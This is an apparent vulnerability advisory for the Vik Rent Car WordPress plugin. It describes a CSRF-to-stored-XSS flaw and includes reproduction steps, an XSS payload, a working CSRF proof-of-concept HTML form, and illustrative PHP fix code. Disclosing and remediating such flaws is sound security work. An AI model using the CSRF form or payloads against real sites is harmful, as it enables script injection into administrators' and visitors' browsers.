WordPress Plugin Vulnerabilities

Vik Rent Car < 1.1.7 - CSRF to Stored XSS

Description

In the plugin, there is a custom field option by which an administrator can manage all the fields that users have to fill in before saving an order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check done before saving the setting, allowing attackers to make a logged-in admin set arbitrary Custom Fields, including one with an XSS payload in it.

Note: The XSS has been fixed in 1.1.6, and the CSRF in 1.1.7

Proof of Concept

Steps to reproduce the bug:

1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit a field and add an XSS payload in the Field Name, e.g. <img src=x onerror=alert(1337)>
3. Save it; the XSS will now trigger whenever anyone visits that page

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="type" value="checkbox" />
      <input type="hidden" name="choose[]" value="" />
      <input type="hidden" name="required" value="1" />
      <input type="hidden" name="flag" value="" />
      <input type="hidden" name="poplink" value="" />
      <input type="hidden" name="task" value="updatecustomf" />
      <input type="hidden" name="option" value="com_vikrentcar" />
      <input type="hidden" name="where" value="13" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
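The two fixes the advisory implies (a CSRF nonce on the save request, and sanitising the field name on input plus escaping it on output) as an added example, not the plugin's own code. The function names, the vrc_custom_fields option key and the nonce action are assumed; the WordPress API calls used are real core functions.

```php
<?php
// Added example (not Vik Rent Car's own code). Hypothetical function names and
// option key; the wp_* / esc_* / sanitize_* calls are real WordPress core APIs.

// Render the edit form: emit a nonce the handler can verify, and escape the
// stored name before it lands in HTML (closes the stored XSS on output).
function vrc_render_custom_field_form( $field_id ) {
    $fields = get_option( 'vrc_custom_fields', array() );
    $name   = isset( $fields[ $field_id ]['name'] ) ? $fields[ $field_id ]['name'] : '';
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php' ) ) . '">';
    wp_nonce_field( 'vrc_update_customf_' . $field_id, 'vrc_nonce' ); // CSRF token
    echo '<input type="hidden" name="option" value="com_vikrentcar" />';
    echo '<input type="hidden" name="task" value="updatecustomf" />';
    echo '<input type="hidden" name="where" value="' . esc_attr( (string) $field_id ) . '" />';
    // A previously saved "<img src onerror=...>" renders as inert text here.
    echo '<input type="text" name="name" value="' . esc_attr( $name ) . '" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}

// Handle the save: capability check, nonce check, then sanitise before storing.
function vrc_handle_update_customf() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    $field_id = isset( $_POST['where'] ) ? absint( $_POST['where'] ) : 0;
    // Rejects the forged cross-site form: a third-party page cannot know the
    // nonce, so the request in the PoC above dies here (closes the CSRF).
    check_admin_referer( 'vrc_update_customf_' . $field_id, 'vrc_nonce' );

    // Strip tags and control characters from the field name before storing it.
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    $type = isset( $_POST['type'] ) ? sanitize_key( $_POST['type'] ) : 'text';
    if ( ! in_array( $type, array( 'text', 'checkbox', 'select' ), true ) ) {
        $type = 'text'; // allow-list the field type instead of trusting input
    }
    $fields              = get_option( 'vrc_custom_fields', array() );
    $fields[ $field_id ] = array(
        'name'     => $name,
        'type'     => $type,
        'required' => ! empty( $_POST['required'] ) ? 1 : 0,
    );
    update_option( 'vrc_custom_fields', $fields );
}

// Dispatch on the plugin's own option/task routing (assumed), after login.
add_action( 'admin_init', function () {
    if ( isset( $_POST['option'], $_POST['task'] )
        && 'com_vikrentcar' === $_POST['option'] && 'updatecustomf' === $_POST['task'] ) {
        vrc_handle_update_customf();
    }
} );
```

Sanitising on input and escaping on output are both kept deliberately: the stored value may already contain a payload saved by an older version, so escaping at render time is what actually prevents execution.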

Affects Plugins

Vik Rent Car (fixed in 1.1.7)

Miscellaneous

Original Researcher
Satyender Yadav
Submitter
Satyender Yadav
Verified
Yes

Timeline

Publicly Published
2021-06-14
Added
2021-06-14
Last Updated
2021-06-25